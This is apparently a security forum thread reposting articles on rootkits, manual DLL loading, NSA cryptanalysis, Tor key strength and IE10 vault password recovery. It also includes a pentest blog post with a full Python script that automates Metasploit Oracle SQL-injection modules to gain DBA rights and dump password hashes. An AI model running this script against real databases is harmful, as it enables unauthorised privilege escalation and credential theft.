Nytro

Inside Windows Rootkits By Chad Tilbury on September 4, 2013 Despite being written in 2006, Chris Ries’ paper Inside Windows Rootkits is still surprisingly relevant. About the only thing missing is a discussion of new(er) x64 mitigation techniques like Kernel Mode Code Signing and Kernel Patch Protection (aka PatchGuard). Few resources have explained rootkit internals so simply. As an example, Figure 2 from the paper neatly ties together the rootkit hooking universe: Figure 2: Potential places to intercept a call to the FindNextFile function, Inside Windows Rootkits by Chris Ries The original PDF is a little hard to find these days, but here are a couple of links: Chris Ries- Inside Windows Rootkits http://thehackademy.net/madchat/vxdevl/library/Inside%20Windows%20Rootkits.pdf Sursa: Inside Windows Rootkits | Forensic Methods

Loading Win32/64 DLLs "manually" without LoadLibrary() By pasztorpisti, 8 Sep 2013 Download LoadDLL.zip (Visual C++ 2010 solution with example program and C/C++ DLLs) - 20.4 KB Introduction Sooner or later many people start thinking about loading a DLL without LoadLibrary(). OK, maybe not so many... It has only a few advantages and can introduce lots of inconvenience problems when coding the DLL (depending on what your DLL does) compared to a situation where you load the DLL with an ordinary LoadLibrary() call, so this technique has limited use. (I will aim the inconvenience problems below.) Still this tip can make good service as a tutorial if you want to understand what's going on behind the curtains... I myself used this stuff to write DLLs in C/C++ instead of coding offset independent assembly (in an anticheat engine), but that is another story. Implementation The most important steps of DLL loading are: Mapping or loading the DLL into memory. Relocating offsets in the DLL using the relocating table of the DLL (if present). Resolving the dependencies of the DLL, loading other DLLs needed by this DLL and resolving the offset of the needed functions. Calling its entrypoint (if present) with the DLL_PROCESS_ATTACH parameter. I wrote the code that performed these steps but then quickly found out something is not OK: This loaded DLL doesn't have a valid HMODULE/HINSTANCE handle and many windows functions expect you to specify one (for example, GetProcAddress(), CreateDialog(), and so on...). Actually the HINSTANCE handle of a module is nothing more than the address of the DOS/PE header of the loaded DLL in memory. I tried to pass this address to the functions but it didn't work because windows checks whether this handle is really a handle and not only the contents of memory! This makes using manually loaded DLLs a bit harder! I had to write my own GetProcAddress() because the windows version didn't work with my DLLs. Later I found out that I want to use dialog resources in the DLL and CreateDialog() also requires a module handle to get the dialog resources from the DLL. For this reason I invented my custom FindResource() function that works with manually loaded DLLs and it can be used to find dialog resources that can be passed to the CreateDialogIndirect() function. You can use other types of resources as well in manually loaded DLLs if you find a function for that resource that cooperates with FindResource(). In this tip you get the code for the manual DLL loader and GetProcAddress(), but I post here the resource related functions in another tip. Limitations The loaded DLL doesn't have a HMODULE so it makes life harder especially when its about resources. The DllMain() doesn't receive DLL_THREAD_ATTACH and DLL_THREAD_DETACH notifications. You could simulate this by creating a small DLL that you load with normal LoadLibrary() and from the DllMain() of this normally loaded DLL you could call the entrypoint of your manually loaded DLLs in case of DLL_THREAD_ATTACH/DLL_THREAD_DETACH. If your DLL imports other DLLs, then the other DLLs are loaded with the WinAPI LoadLibrary(). This is actually not a limitation, just mentioned it for your information. Actually it would be useless to start loading for example kernel32.dll with manual dll loading, most system DLLs would probably disfunction/crash! I've written my DLLs with /NODEFAULTLIB linker option that means you can't reach CRT functions and it reduces your DLL size considerably (like with 4K intros). But then you have to go with pure WinAPI! Unfortunately the CRT of MS is very complex and relies on the HMODULE of the loaded DLL so you can't use the CRT. This can be quite inconvenient but you can overcome this by writing your own mini CRT. I've provided one such mini CRT in my C++ example without attempting to be comprehensive but it at least allows you to use the most basic C++ features: automatically initialized static variables, new/delete operators. BTW, if you are about to use this code then you should understand most of these problems and you should appreciate that writing C/C++ DLL without CRT is still much more convenient than writing something as an offset independent or relocatable assembly patch. Using the code Write your DLL in C/C++ without using CRT (link with /NODEFAULTLIB). Load your DLL with the LoadLibrary() code I provided. You can use my custom GetProcAddress() on the loaded DLL. If you want to use dialog resources (or some other kind of resource, but dialog is the most common) then you can use the FindResource() function I provided in one of my other tips (and the CreateDialogIndirect WinAPI function) because that works with manually loaded DLLs as well: The inner working of FindResource() and LoadString() Win32 functions. Download the attached VC++2010 solution that contains a sample program that loads and uses 2 DLLs. One DLL has been written in C and the other in C++. Sursa: Loading Win32/64 DLLs "manually" without LoadLibrary() - CodeProject

Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise Disclosure Date 1992-03-01 Several Crypto AG machines based on Boris Hagelin's design are known to have a backdoor in the encryption scheme. In 1957, the United States National Security Agency (NSA) brokered a deal with Hagelin allowing them to place a backdoor into the cipher scheme. This allowed the NSA to trivially access secret communications between two devices, as used by the Iranian Islamic regime, Saddam Hussein, Moammar Gadhafi, Ferdinand Marcos, Idi Amin, and even the Vatican. This backdoored access was shared with intelligence agencies in England as well. Not until 1992 was the backdoor finally published. Location: Context Dependent Attack Type: Cryptographic Impact: Loss of Integrity Solution: Discontinued Product Exploit: Exploit Private Disclosure: Uncoordinated Disclosure Due to the encryption device being compromised through the National Security Agency backdoor, it is widely accepted that it should no longer be used. It is recommended that an alternate, stronger device be used to ensure data is properly protected. Sursa: 95427: Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise Nu e tocmai exploit-ul clasic la care va asteptati, dar povestea e interesanta.

[h=1]Chris Hadnagy Nonverbal Human Hacking[/h] As time goes by, and defenses get stronger, attackers are responding by upping their game as well. Techniques and tactics that defenders must contend with keep escalating, making it much more difficult to content with and track. With that in mind, social engineering is the easiest and quickest way into companies. The team at Social-Engineer.Org have analyzed some of the ways that social engineers manipulate their targets and then interviewed some of the top minds in the world on the subjects of con-men, persuasion, body language and microexpressions. In edition, we have personally taken training with some of the great minds like Dr. Paul Ekman. All of this has led us to research the topic of non-verbal human hacking. It is a mixture of the principles of NLP, Body language and Microexpressions used to manipulate targets into an emotional state that allows for control.

[h=1]Ange Albertini A Bit More of PE[/h] Among other things, I briefly introduced in Hashdays 2011 (cf hashdays2011.corkami.com) my recent PE experiments, already failing all the tools I tried. I will focus this time only on the PE format, describing in detail the weirdness of the format, pushing it as usual to its limits

[h=1]Browser Extensions - The Backdoor To Stealth Malware[/h] Julien Sobrier SOURCE Seattle 2012

[h=1]Building Dictionaries And Destroying Hashes Using Amazon EC2[/h] Steve Werby & Randy Todd SOURCE Seattle 2012

[h=2]Oracle Exploitation – Privilege Escalation[/h]September 7, 2013 milo2012 Many times during Penetration Tests, we found a limited account for the Oracle database server. The next step would be to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges. The Metasploit modules scripts below are for different varying versions of Oracle database servers. I cant remember which Metasploit modules are for which versions. To speed things up, I wrote a script that does the below (1) Check if the account specified has access to the database (2) Check if the account has DBA privileges (3) If no, check the version of the Oracle database server (4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk (5) Run the Metasploit resource script and attempt to gain DBA privileges (6) Check permissions of account and verifies if DBA privileges have been obtained. ora_priv.py script The script is still a work in progress. You can download the script via the below link. https://github.com/milo2012/pentest_scripts/blob/master/oracle_pillage/ora_priv.py import timeimport sys import csv import re import argparse import urllib import os.path import fileinput import subprocess import socket import os import itertools from collections import defaultdict from pprint import pprint from termcolor import colored from subprocess import call sid = "" metasploitPath = "" #metasploitPath = "/pentest/metasploit-framework/" # Made by Keith Lee # http://milo2012.wordpress.com # @keith55 try: import cx_Oracle except ImportError: print "[!] Please install cx_Oracle" sys.exit() def msfPrivEscUnknown(username,password,hostname,sid): outputMsfFile = "msfresource.rc" myfile = open(outputMsfFile, "w") stmt = "setg DBUSER "+username+"\n" stmt += "setg DBPASS "+password+"\n" stmt += "setg SQL grant dba to "+username+"\n" stmt += "setg SID "+sid+"\n" stmt += "setg RHOST "+hostname+"\n" myfile.write(stmt) #Last Attempts myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish2\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish3\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_xml\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_metadata_open\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/droptable_trigger\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_compressworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_mergeworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_removeworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_rollbackworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("exit\n") myfile.close() command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" print command call(command, shell=True) def msfPrivEsc(username,password,hostname,sid): #Check version before doing privilege escalation """ orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) curs = orcl1.cursor() curs.execute("select * from v$version") row = curs.fetchone() curs.close() oracleVer = str(row) """ oracleVer = "10.1" outputMsfFile = "msfresource.rc" myfile = open(outputMsfFile, "w") stmt = "setg DBUSER "+username+"\n" stmt += "setg DBPASS "+password+"\n" stmt += "setg SQL grant dba to "+username+"\n" stmt += "setg SID "+sid+"\n" stmt += "setg RHOST "+hostname+"\n" myfile.write(stmt) #if "9.0" in str(row) or "10.1" in str(row) or "10.2" in str(row): if "9.0" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") myfile.write("exploit\n") myfile.write("sleep 3\n") if "9.0" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") myfile.write("exploit\n") myfile.write("sleep 3\n") if "10.1" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "10.2" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "11.0" in oracleVer: myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "11.1" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "11.2" in oracleVer: myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("exit\n") myfile.close() command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" print command call(command, shell=True) def dumpHashes(username,password,hostname,sid): orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) curs = orcl.cursor() curs.execute("SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'") test1 = curs.fetchall() print colored("\n[+] Below are the password hashes for SID: "+sid+".","red",attrs=['bold']) for i in test1: print i curs.close() def checkPermissions(username,password,hostname,sid,firstRun): try: orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) curs = orcl.cursor() curs.execute("select * from v$database") #Get a list of all databases curs.close() print colored(str("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Success)"),"red",attrs=['bold']) dumpHashes(username,password,hostname,sid) return True except cx_Oracle.DatabaseError as e: error, = e.args if error.code == 1017: print "[-] Testing: "+username.strip()+"/"+password.strip()+". (Fail)" sys.exit() if error.code == 942: if firstRun==True: print colored("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Insufficient Privileges). Trying to escalate privileges.","red",attrs=['bold']) return False if __name__=="__main__": parser = argparse.ArgumentParser(description='Oracle Privilege Escalation') parser.add_argument('-host', help='IP or host name of Oracle server') parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers') parser.add_argument('-u', dest='username', help='Use this username to authenticate') parser.add_argument('-p', dest='password', help='Use this password to authenticate') parser.add_argument('-sid', dest='sid', help='Use this sid') args = vars(parser.parse_args()) hostList = [] counter=0 if args['host']!=None: counter+=1 if args['hostFile']!=None: counter+=1 if args['hostFile']!=None and args['host']==None: for line in open(args['hostFile'],'r'): hostList.append(line.strip()) if args['host']!=None and args['hostFile']==None: hostList.append(args['host']) if counter==0 or counter>1: print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold']) sys.exit(0) if args['sid']!=None: sid = args['sid'] #Check if username/password is provided in the command line credCount=0 if args['username']!=None: credCount+=1 if args['password']!=None: credCount+=1 if credCount>1 and credCount<2: print "[!] You need to provide both -u and -p." sys.exit(0) #Load hostname for hostname in hostList: if len(hostname)<1: sys.exit(0) socketAvail = False try: socket.setdefaulttimeout(2) s = socket.socket() s.connect((hostname,1521)) socketAvail=True print "[+] Connected to "+hostname+":1521" except: print "[-] Cannot connect to "+hostname+":1521" if socketAvail==True: username = args['username'] password = args['password'] print "[+] [sID:"+sid+"] Testing accounts. " if checkPermissions(username,password,hostname,sid,firstRun=True)==False: print colored("[+] Attempting Metasploit Oracle SQL Privilege Escalation","red",attrs=['bold']) msfPrivEsc(username,password,hostname,sid) if checkPermissions(username,password,hostname,sid,firstRun=False)==False: print colored("[+] Attempting Addition Oracle SQL Privilege Escalation","red",attrs=['bold']) msfPrivEscUnknown(username,password,hostname,sid) if checkPermissions(username,password,hostname,sid,firstRun=False)==False: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Unable to Escalate to DBA)","red",attrs=['bold']) else: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) else: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) else: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) Sursa: Oracle Exploitation – Privilege Escalation | Milo2012's Security Blog

Polishing Chrome for Fun and Profit 29/08/2013 Nils & Jon Agenda •Introduction •Google Chrome •Pwn2Own Vulnerabilities •Demo Google Chrome •Widely considered to be the most secure web browser available •Designed from the ground up with security in mind •Lots of security work ongoing –Code reviews –Fuzzing (own code & 3rd party) Download: https://t.co/mZMq4aun1K

September 6, 2013 The NSA's Cryptographic Capabilities The latest Snowden document is the US intelligence "black budget." There's a lot of information in the few pages the Washington Post decided to publish, including an introduction by Director of National Intelligence James Clapper. In it, he drops a tantalizing hint: "Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic." Honestly, I'm skeptical. Whatever the NSA has up its top-secret sleeves, the mathematics of cryptography will still be the most secure part of any encryption system. I worry a lot more about poorly designed cryptographic products, software bugs, bad passwords, companies that collaborate with the NSA to leak all or part of the keys, and insecure computers and networks. Those are where the real vulnerabilities are, and where the NSA spends the bulk of its efforts. This isn't the first time we've heard this rumor. In a WIRED article last year, longtime NSA-watcher James Bamford wrote: According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. We have no further information from Clapper, Snowden, or this other source of Bamford's. But we can speculate. Perhaps the NSA has some new mathematics that breaks one or more of the popular encryption algorithms: AES, Twofish, Serpent, triple-DES, Serpent. It wouldn't be the first time this happened. Back in the 1970s, the NSA knew of a cryptanalytic technique called "differential cryptanalysis" that was unknown in the academic world. That technique broke a variety of other academic and commercial algorithms that we all thought secure. We learned better in the early 1990s, and now design algorithms to be resistant to that technique. It's very probable that the NSA has newer techniques that remain undiscovered in academia. Even so, such techniques are unlikely to result in a practical attack that can break actual encrypted plaintext. The naive way to break an encryption algorithm is to brute-force the key. The complexity of that attack is 2n, where n is the key length. All cryptanalytic attacks can be viewed as shortcuts to that method. And since the efficacy of a brute-force attack is a direct function of key length, these attacks effectively shorten the key. So if, for example, the best attack against DES has a complexity of 239, that effectively shortens DES's 56-bit key by 17 bits. That's a really good attack, by the way. Right now the upper practical limit on brute force is somewhere under 80 bits. However, using that as a guide gives us some indication as to how good an attack has to be to break any of the modern algorithms. These days, encryption algorithms have, at a minimum, 128-bit keys. That means any NSA cryptanalytic breakthrough has to reduce the effective key length by at least 48 bits in order to be practical. There's more, though. That DES attack requires an impractical 70 terabytes of known plaintext encrypted with the key we're trying to break. Other mathematical attacks require similar amounts of data. In order to be effective in decrypting actual operational traffic, the NSA needs an attack that can be executed with the known plaintext in a common MS-Word header: much, much less. So while the NSA certainly has symmetric cryptanalysis capabilities that we in the academic world do not, converting that into practical attacks on the sorts of data it is likely to encounter seems so impossible as to be fanciful. More likely is that the NSA has some mathematical breakthrough that affects one or more public-key algorithms. There are a lot of mathematical tricks involved in public-key cryptanalysis, and absolutely no theory that provides any limits on how powerful those tricks can be. Breakthroughs in factoring have occurred regularly over the past several decades, allowing us to break ever-larger public keys. Much of the public-key cryptography we use today involves elliptic curves, something that is even more ripe for mathematical breakthroughs. It is not unreasonable to assume that the NSA has some techniques in this area that we in the academic world do not. Certainly the fact that the NSA is pushing elliptic-curve cryptography is some indication that it can break them more easily. If we think that's the case, the fix is easy: increase the key lengths. Assuming the hypothetical NSA breakthroughs don't totally break public-cryptography -- and that's a very reasonable assumption -- it's pretty easy to stay a few steps ahead of the NSA by using ever-longer keys. We're already trying to phase out 1024-bit RSA keys in favor of 2048-bit keys. Perhaps we need to jump even further ahead and consider 3072-bit keys. And maybe we should be even more paranoid about elliptic curves and use key lengths above 500 bits. One last blue-sky possibility: a quantum computer. Quantum computers are still toys in the academic world, but have the theoretical ability to quickly break common public-key algorithms -- regardless of key length -- and to effectively halve the key length of any symmetric algorithm. I think it extraordinarily unlikely that the NSA has built a quantum computer capable of performing the magnitude of calculation necessary to do this, but it's possible. The defense is easy, if annoying: stick with symmetric cryptography based on shared secrets, and use 256-bit keys. There's a saying inside the NSA: "Cryptanalysis always gets better. It never gets worse." It's naive to assume that, in 2013, we have discovered all the mathematical breakthroughs in cryptography that can ever be discovered. There's a lot more out there, and there will be for centuries. And the NSA is in a privileged position: It can make use of everything discovered and openly published by the academic world, as well as everything discovered by it in secret. The NSA has a lot of people thinking about this problem full-time. According to the black budget summary, 35,000 people and $11 billion annually are part of the Department of Defense-wide Consolidated Cryptologic Program. Of that, 4 percent -- or $440 million -- goes to "Research and Technology." That's an enormous amount of money; probably more than everyone else on the planet spends on cryptography research put together. I'm sure that results in a lot of interesting -- and occasionally groundbreaking -- cryptanalytic research results, maybe some of it even practical. Still, I trust the mathematics. This essay originally appeared on Wired.com. EDITED TO ADD: That was written before I could talk about this. EDITED TO ADD: The Economist expresses a similar sentiment. Sursa: https://www.schneier.com/blog/archives/2013/09/the_nsas_crypto_1.html

[h=3]Tor is still DHE 1024 (NSA crackable)[/h] By Robert Graham After more revelations, and expert analysis, we still aren't precisely sure what crypto the NSA can break. But everyone seems to agree that if anything, the NSA can break 1024 RSA/DH keys. Assuming no "breakthroughs", the NSA can spend $1 billion on custom chips that can break such a key in a few hours. We know the NSA builds custom chips, they've got fairly public deals with IBM foundries to build chips. The problem with Tor is that it still uses these 1024 bit keys for much of its crypto, particularly because most people are still using older versions of the software. The older 2.3 versions of Tor uses keys the NSA can crack, but few have upgraded to the newer 2.4 version with better keys. You can see this for yourself by going to a live listing of Tor servers, like TorStatus - Tor Network Status. Only 10% of the servers have upgraded to version 2.4. Recently, I ran a "hostile" exit node and recorded the encryption negotiated by incoming connections (the external link encryption, not the internal circuits). This tells me whether they are using the newer or older software. Only about 24% of incoming connections were using the newer software. Here's a list of the counts: 14134 -- 0x0039 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 5566 -- 0xc013 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 2314 -- 0x0016 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 905 -- 0x0033 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 1 -- 0xc012 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA The older software negotiates "DHE", which are 1024 bit Diffie-Hellman keys. The newer software chooses ECDHE, which are Elliptical-Curve keys. I show the raw data because I'm confused by the last entry, I'm not sure how the software might negotiate ECDHE+3DES, it seems like a lulz-worthy combination (not that it's insecure -- just odd). Those selecting DHE+3DES are also really old I think. I don't know enough about Tor, but I suspect anything using DHE+3DES is likely more than 5 years old. (By the way, I used my Ferret tool to generate this, typing "ferret suites -r ".) The reason software is out of date is because it takes a long time for repositories to be updated. If you type "apt-get install tor" on a Debian/Ubuntu computer, you get the 2.3 version. And this is what pops up as the suggestion of what you should do when you go to the Tor website. Sure, it warns you that the software might be out-of-date, but it doesn't do a good job pointing out that it's almost a year out of date, and the crypto the older version is using is believed to be crackable by the NSA. Of course, this is still just guessing about the NSA's capabilities. As it turns out, the newer Elliptical keys may turn out to be relatively easier to crack than people thought, meaning that the older software may in fact be more secure. But since 1024 bit RSA/DH has been the most popular SSL encryption for the past decade, I'd assume that it's that, rather than curves, that the NSA is best at cracking. Therefore, I'd suggest that the Tor community do a better job getting people to upgrade to 2.4. Old servers with crackable crypto, combined with the likelyhood the NSA runs hostile Tor nodes, means that it's of much greater importance. Sursa: Errata Security: Tor is still DHE 1024 (NSA crackable)

Paranoici mai sunteti. Nu ne-a atacat nimeni, am lucrat eu la server.

Interesant. Deci RSA in loc de ECDH.

Asa, asa

Password Algorithms: Internet Explorer 10 (Windows Vault) Introduction Microsoft added a new feature to Windows 7 called ‘Vault’ which you can access through the Credential Manager in control panel or vaultcmd from command line. It works very similar to Gnome Key Ring on Linux or the Apple Keychain on Mac OS. In versions 7, 8 and 9 of Internet Explorer, passwords were protected using DPAPI and the login URL as entropy before being saved in the registry. The new algorithm in IE10 continues to use DPAPI but the encryption of credentials is now handled by the Vault Service. Vault System Service Like most Windows Encryption, the protection of Vault data occurs within a LocalSystem service. vaultsvc.dll contains the service code and is loaded by the Local Security Account Subsystem (lsass.exe) at boot time. Between 18-24 functions (depending on OS) are exposed to clients over a local RPC end point. On Windows 7 is an additional KeyRing Credential UI application (VaultSysUI.exe) launched by the service if it requires information from the owner of a vault. For example, you have the ability to lock a vault with a password. You can also configure a vault to require permission from the user when an application attempts to access the password element. In both situations, VaultSysUI will display a window to the user and then write the response back to heap memory which Vault Service can access. Although both these features are useful and add further protection to a user’s credentials, they were removed in Windows 8 along with other functionality. Vault Client Library Access From the user session, RPC calls are made through API exported by vaultcli.dll Explorer.exe loads Credui.dll and Vault.dll when accessing the Credential Manager through the Control Panel. You can also use vaultcmd.exe to add/remove credentials but it doesn’t display passwords on either 7 or 8. On Windows 8 . . . For whatever reasons, there was a pretty significant reduction in Vault features between Windows 7 and 8. Below is a list of what was removed. Creation / Deletion of vaults. Loading / Unloading external vault files. Locking / Unlocking vaults with additional password protection. Protection Methods Windows 7 has 2 methods available but Windows 8 only has 1. DPAPI (Data Protection API) is used by default but on Windows 7, you can also use a password. The algorithm used to protect passwords is RSA PBKDF2. Recovery of Web Credentials As said, there were some changes to Vault service between Windows 7 and 8. VaultGetItem requires an additional parameter on Windows 8 and the VAULT_ITEM structure has an extra property. Here’s the structure for Windows 7 typedef struct _VAULT_ITEM_W7 { GUID SchemaId; LPCWSTR pszCredentialFriendlyName; PVAULT_ITEM_ELEMENT pResourceElement; PVAULT_ITEM_ELEMENT pIdentityElement; PVAULT_ITEM_ELEMENT pAuthenticatorElement; FILETIME LastModified; DWORD dwFlags; DWORD dwPropertiesCount; PVAULT_ITEM_ELEMENT pPropertyElements; } VAULT_ITEM_W7, *PVAULT_ITEM_W7; And for Windows 8 . . . typedef struct _VAULT_ITEM_W8 { GUID SchemaId; LPCWSTR pszCredentialFriendlyName; PVAULT_ITEM_ELEMENT pResourceElement; PVAULT_ITEM_ELEMENT pIdentityElement; PVAULT_ITEM_ELEMENT pAuthenticatorElement; PVAULT_ITEM_ELEMENT pPackageSid; FILETIME LastModified; DWORD dwFlags; DWORD dwPropertiesCount; PVAULT_ITEM_ELEMENT pPropertyElements; } VAULT_ITEM_W8, *PVAULT_ITEM_W8; I’ve written a tool to recover IE10 passwords using the Vault API, here’s example of output on Windows 7 machine. For those of you that want to know more about recovery process, you can grab source and binary here. Because the Windows Vault Service remains undocumented, I can’t guarantee the accuracy of information provided. The latest protection of Web Credentials for Internet Explorer is indeed weaker than previous algorithm for 7, 8 and 9 but the upside is that with the Vault you can reliably backup/restore your passwords when needed. Below is just a list of API available/removed between Windows 7 and 8. [TABLE] [TR] [TD]Credential Vault Client Library Function[/TD] [TD]Windows 7[/TD] [TD]Windows 8[/TD] [/TR] [TR] [TD]VaultCreateItemType[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultDeleteItemType[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultEnumerateItemTypes[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultAddItem[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultFindItems[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultEnumerateItems[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultGetItem[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultRemoveItem[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultGetItemType[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultOpenVault[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultCloseVault[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultGetInformation[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultEnumerateVaults[/TD] [TD]Yes[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultSetInformation[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultCreateVault[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultCopyVault[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultDeleteVault[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultLoadVaults[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultUnloadVaults[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultCopyItem[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultMoveItem[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultLockVault[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultUnlockVault[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultConfirmVaultAccess[/TD] [TD]Yes[/TD] [TD]No[/TD] [/TR] [TR] [TD]VaultEnumerateSettingUnits[/TD] [TD]No[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultGetSettingUnit[/TD] [TD]No[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultApplySettingUnit[/TD] [TD]No[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultRemoveSettingUnit[/TD] [TD]No[/TD] [TD]Yes[/TD] [/TR] [TR] [TD]VaultTriggerSync[/TD] [TD]No[/TD] [TD]Yes[/TD] [/TR] [/TABLE] Sursa: Password Algorithms: Internet Explorer 10 (Windows Vault) | Insecurety Research

[h=2]September 5, 2013[/h] [h=3]The NSA Is Breaking Most Encryption on the Internet[/h] The new Snowden revelations are explosive. Basically, the NSA is able to decrypt most of the Internet. They're doing it primarily by cheating, not by mathematics. It's joint reporting between the Guardian, the New York Times, and ProPublica. I have been working with Glenn Greenwald on the Snowden documents, and I have seen a lot of them. These are my two essays on today's revelations. Remember this: The math is good, but math has no agency. Code has agency, and the code has been subverted. Sursa: Schneier on Security: The NSA Is Breaking Most Encryption on the Internet

